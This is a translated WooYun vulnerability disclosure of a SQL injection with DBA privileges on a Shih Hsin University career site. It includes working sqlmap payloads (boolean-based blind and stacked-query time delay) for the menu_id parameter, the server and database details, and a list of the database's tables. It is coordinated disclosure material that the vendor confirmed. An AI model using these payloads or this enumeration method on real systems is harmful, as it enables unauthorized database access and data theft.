
Vulnerability summary

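Bug ID: wooyun-2015-0159780

Title: SQL injection with DBA privileges on a Shih Hsin University (世新大學) career site (Taiwan region)

Affected vendor: Shih Hsin University (世新大學)

Reported by: 路人甲

Submitted: 2015-12-10 15:53

Fixed: 2016-01-28 17:10

Disclosed: 2016-01-28 17:10

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (Hitcon, the Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]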



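Vulnerability details

Disclosure status:

2015-12-10: Details sent to the vendor; awaiting vendor action
2015-12-14: Vendor confirmed; details disclosed to the vendor only
2015-12-24: Details disclosed to core white hats and experts in related fields
2016-01-03: Details disclosed to regular white hats
2016-01-13: Details disclosed to trainee white hats
2016-01-28: Details disclosed to the public

Brief description:

Detailed description:

Shih Hsin University career guidance site (世新大學職涯導航站)
Injection point (menu_id): http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598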

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: menu_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: menu_id=5 AND 3436=3436&submenu_id=413&apmenu_id=1598
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: menu_id=5;WAITFOR DELAY '0:0:5'--&submenu_id=413&apmenu_id=1598
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current database: 'CareerGuide_Shu'
current user is DBA: True
available databases [5]:
[*] CareerGuide_Shu
[*] master
[*] model
[*] msdb
[*] tempdb


The database user has DBA privileges, so system commands can be executed:

[Screenshot: 2222.jpg]


Database: CareerGuide_Shu
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| dbo.FunctionRecords | 308682 |
| dbo.VisitorRecords | 14623 |
| dbo.Class_sign | 8204 |
| dbo.Code | 4039 |
| dbo.Code_201201 | 3999 |
| dbo.LearnMap | 1789 |
| dbo.papers | 1682 |
| dbo.Account | 1585 |
| dbo.appear_papers | 1493 |
| dbo.Job_Jobtype_TOT | 1337 |
| dbo.Job_Main_TOT | 1019 |
| dbo.Res_Comp_TOT | 992 |
| dbo.Res_Epaper | 944 |
| dbo.Job_Desc_TOT | 925 |
| dbo.Consultant_Calendar | 879 |
| dbo.Cmp_Main | 817 |
| dbo.JobNeeded | 800 |
| dbo.Res_Main_TOT | 768 |
| dbo.Res_Status_TOT | 764 |
| dbo.Job_Lan_TOT | 588 |
| dbo.rule_acl | 546 |
| dbo.Job_Major_TOT | 493 |
| dbo.Res_Jobtype_TOT | 474 |
| dbo.Res_Indtype_TOT | 454 |
| dbo.Consultant_Booking | 360 |
| dbo.Res_Area_TOT | 342 |
| dbo.Cmp_Profile | 240 |
| dbo.DataCheck | 240 |
| dbo.Class | 207 |
| dbo.MyBook | 206 |
| dbo.Res_Exp_TOT | 156 |
| dbo.Res_Lan_TOT | 147 |
| dbo.Res_Profile_TOT | 142 |
| dbo.admin_tools | 129 |
| dbo.Res_Workexp_TOT | 116 |
| dbo.Res_cerT_TOT | 92 |
| dbo.Cmp_Image | 89 |
| dbo.Cmp_Sort | 89 |
| dbo.Res_edU_TOT | 80 |
| dbo.extra_function | 78 |
| dbo.Cmp_News | 74 |
| dbo.ForumMain | 58 |
| dbo.Res_Course_TOT | 53 |
| dbo.system_profile_ext | 52 |
| dbo.Share | 49 |
| dbo.Epaper_MailList | 43 |
| dbo.label | 43 |
| dbo.EpaperList | 42 |
| dbo.Cmp_Gmessage | 29 |
| dbo.Res_Reward_TOT | 29 |
| dbo.Res_Association_TOT | 27 |
| dbo.Res_Parttime_TOT | 27 |
| dbo.Consultant_Teacher | 22 |
| dbo.Res_Service_TOT | 19 |
| dbo.mail_open | 18 |
| dbo.Res_Jobplan_TOT | 18 |
| dbo.Res_ExtrActive_TOT | 15 |
| dbo.function_class | 10 |
| dbo.Res_Hidden_TOT | 9 |
| dbo.label_class | 7 |
| dbo.rule_user | 7 |
| dbo.rule_group | 6 |
| dbo.user_basic | 6 |
| dbo.HotMessage | 5 |
| dbo.epaper_type | 3 |
| dbo.Res_Check_TOT | 2 |
| dbo.FAQ | 1 |
| dbo.system_profile | 1 |
+-------------------------+---------+

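Both the number of tables and the volume of data are large.

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)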


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-14 23:35

Vendor reply:

Thank you for the report.

Latest status:

None